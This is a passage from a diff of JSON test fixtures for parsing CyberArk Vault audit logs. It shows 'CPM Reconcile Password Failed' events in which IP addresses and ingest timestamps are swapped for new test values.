\u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. 
Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=2;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"2\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615727895\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\n 
\u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"2\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615727895\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "2", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", 
"policy_id": "WinDomain", @@ -203,9 +181,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615727895", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", 
@@ -219,8 +197,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176778300Z", - "original": "\u003c7\u003e1 2021-03-14T13:18:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=2;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615727895\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:18:15\",\"IsoTimestamp\":\"2021-03-14T13:18:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM 
Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=2;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615727895\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403073500Z", + "original": "\u003c7\u003e1 2021-03-14T13:18:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615727895\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:18:15\",\"IsoTimestamp\":\"2021-03-14T13:18:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM 
Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=2;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615727895\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -248,17 +226,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", 
@@ -278,7 +247,7 @@ }, "@timestamp": "2021-03-14T13:46:13.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -290,27 +259,27 @@ ], "ip": [ "10.0.1.20", - "34.123.103.115" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", "iso_timestamp": "2021-03-14T13:46:13Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", 
@@ -322,7 +291,7 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", 
@@ -336,8 +305,8 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-06-09T10:24:36.176780600Z", - "original": "\u003c7\u003e1 2021-03-14T13:46:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" 